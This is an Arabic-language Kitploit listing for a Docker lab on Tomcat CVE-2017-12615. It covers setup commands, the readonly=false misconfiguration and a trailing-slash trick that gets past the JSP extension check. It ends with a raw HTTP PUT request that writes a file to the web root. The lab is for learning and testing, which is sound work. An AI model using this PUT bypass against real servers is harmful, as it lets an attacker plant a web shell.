Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Tomcat-CVE-2017-12615 — بيئة معملية قائمة على Docker لاستغلال ثغرة الكتابة التعسفية للملفات في Tomcat CVE-2017-12615 عبر طريقة PUT، مع تقنيات تجاوز وكود إثبات المفهوم. | Kitploit
أدوات/GitHubGitHub/cyberharsh/tomcat-cve-2017-12615
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubcyberharsh/tomcat-cve-2017-12615

Tomcat-CVE-2017-12615

بيئة معملية قائمة على Docker لاستغلال ثغرة الكتابة التعسفية للملفات في Tomcat CVE-2017-12615 عبر طريقة PUT، مع تقنيات تجاوز وكود إثبات المفهوم.

عرض المستودع
2منذ 6 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ثغرة الكتابة التعسفية للملفات في Tomcat من خلال طريقة PUT (CVE-2017-12615)

中文版本(Chinese version)

إصدار Tomcat: 8.5.19

إعداد البيئة

docker-compose build
docker-compose up -d

بعد تشغيل الأوامر أعلاه بنجاح، سترى صفحة المثال الخاصة بـ Tomcat عند زيارة الموقع http://your-ip:8080.

الأساس المنطقي

روابط مرجعية:

  • http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0107097.html
  • https://mp.weixin.qq.com/s?__biz=MzI1NDg4MTIxMw==&mid=2247483659&idx=1&sn=c23b3a3b3b43d70999bdbe644e79f7e5
  • https://mp.weixin.qq.com/s?__biz=MzU3ODAyMjg4OQ==&mid=2247483805&idx=1&sn=503a3e29165d57d3c20ced671761bb5e

يقوم Tomcat بتعيين صلاحية الكتابة(readonly=false),مما يؤدي إلى إمكانية كتابة ملفات إلى الخادم.

<servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param>
        <param-name>debug</param-name>
        <param-value>0</param-value>
    </init-param>
    <init-param>
        <param-name>listings</param-name>
        <param-value>false</param-value>
    </init-param>
    <init-param>
        <param-name>readonly</param-name>
        <param-value>false</param-value>
    </init-param>
    <load-on-startup>1</load-on-startup>
</servlet>

على الرغم من أن Tomcat يتحقق من امتداد الملف إلى حد ما(لا يمكن كتابة jsp مباشرة)، إلا أنه يمكننا تجاوز هذا القيد من خلال بعض ميزات نظام الملفات(مثل استخدام / في Linux).

إثبات المفهوم

أرسل الحزم التالية مباشرة ثم سيتم كتابة القشرة (shell) في الدليل الجذر للويب.

PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

shell

على النحو التالي:

تنزيل الأداة